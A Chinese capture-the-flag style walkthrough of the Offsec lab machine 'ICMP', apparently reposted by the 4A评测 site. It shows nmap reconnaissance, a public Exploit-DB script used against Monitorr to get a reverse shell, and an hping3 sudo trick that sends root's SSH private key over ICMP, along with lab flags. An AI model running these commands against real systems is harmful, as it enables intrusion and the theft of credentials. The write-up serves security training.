信息收集
| IP Address | Opening Ports |
|---|---|
| 192.168.52.218 | TCP:22,80 |
$ nmap -p- 192.168.52.218 --min-rate 1000 -sC -sV -Pn
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
| 256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_ 256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-title: Monitorr | Monitorr
|_Requested resource was http://192.168.52.218/mon/
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Monitorr-RCE
![[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图](https://img.4awl.net/img/50/25c8d65e630f3eb28a627eb59b1f83.jpg "[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图")
$ searchsploit Monitorr -w
![[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图1](https://img.4awl.net/img/38/72e91f5a3b9d78c997dcfa826019b5.jpg "[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图1")
http://192.168.52.218/mon/assets/php/upload.php
![[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图2](https://img.4awl.net/img/ac/f55b1330be002520aeeae89e5c19d5.jpg "[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图2")
$ python3 /usr/share/exploitdb/exploits/php/webapps/48980.py http://192.168.52.218/mon 192.168.49.52 10077
![[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图3](https://img.4awl.net/img/c9/def2cf3f17403bddc615485012fcca.jpg "[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图3")
fox目录下存在Local.txt
Local.txt
4d2ed33d3467974721246fd088ec495c
www-data -> fox
www-data@icmp:/home/fox$ cat reminder
![[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图4](https://img.4awl.net/img/69/c62118574fb61473b2a2f0166b23e8.jpg "[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图4")
www-data@icmp:/home/fox$ cat ./devel/crypt.php
![[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图5](https://img.4awl.net/img/2d/3a698b5396f04b6a1b422f254e6000.jpg "[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图5")
BUHNIJMONIBUVCYTTYVGBUHJNI
![[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图6](https://img.4awl.net/img/d4/94fd0ee5a1d28af1d3ba7b5a674736.jpg "[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图6")
权限提升-hping3
$ sudo -l
![[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图7](https://img.4awl.net/img/7c/fafa2a565991dade585f57eb429685.jpg "[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图7")
https://gtfobins.github.io/gtfobins/hping3/
![[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图8](https://img.4awl.net/img/f2/694633270284fe75dbba30280a28f7.jpg "[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图8")
如果你尝试在kali上运行可能会触发内存锁定警告,所以保险的方法就是监听和执行应均在靶机上执行...
$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe
$ sudo hping3 --icmp 127.0.0.1 --sign signature --file /root/.ssh/id_rsa -d 4000 -c 2
![[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图9](https://img.4awl.net/img/21/600486e982ed958949241571486886.jpg "[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图9")
$ chmod 600 id_rsa
$ ssh -i ./id_rsa [email protected]
![[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图10](https://img.4awl.net/img/f8/e2943b563b032734b88431bd582b21.jpg "[Offsec Lab] ICMP Monitorr-RCE+hping3权限提升插图10")
proof.txt
407e47c8f6e703f101254a04448f1014
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
